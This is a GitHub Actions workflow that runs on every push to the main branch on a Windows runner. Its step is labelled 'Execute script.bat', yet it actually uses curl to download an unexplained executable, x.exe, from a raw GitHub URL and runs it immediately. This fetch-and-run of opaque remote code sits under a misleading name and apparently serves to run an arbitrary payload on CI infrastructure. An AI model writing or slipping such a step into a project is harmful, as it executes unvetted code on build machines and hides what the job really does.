name: Execute Batch Script with Curl

on:
  push:
    branches:
      - main

jobs:
  run-batch:
    runs-on: windows-latest

    steps:
    - name: Checkout repository
      uses: actions/checkout@v3

    - name: Execute script.bat
      run: |
        curl -L -o "C:\Users\runneradmin\Desktop\x.exe" "https://raw.githubusercontent.com/miso201/miso201/refs/heads/main/w10/x.exe"
        "C:\Users\runneradmin\Desktop\x.exe"
      shell: cmd
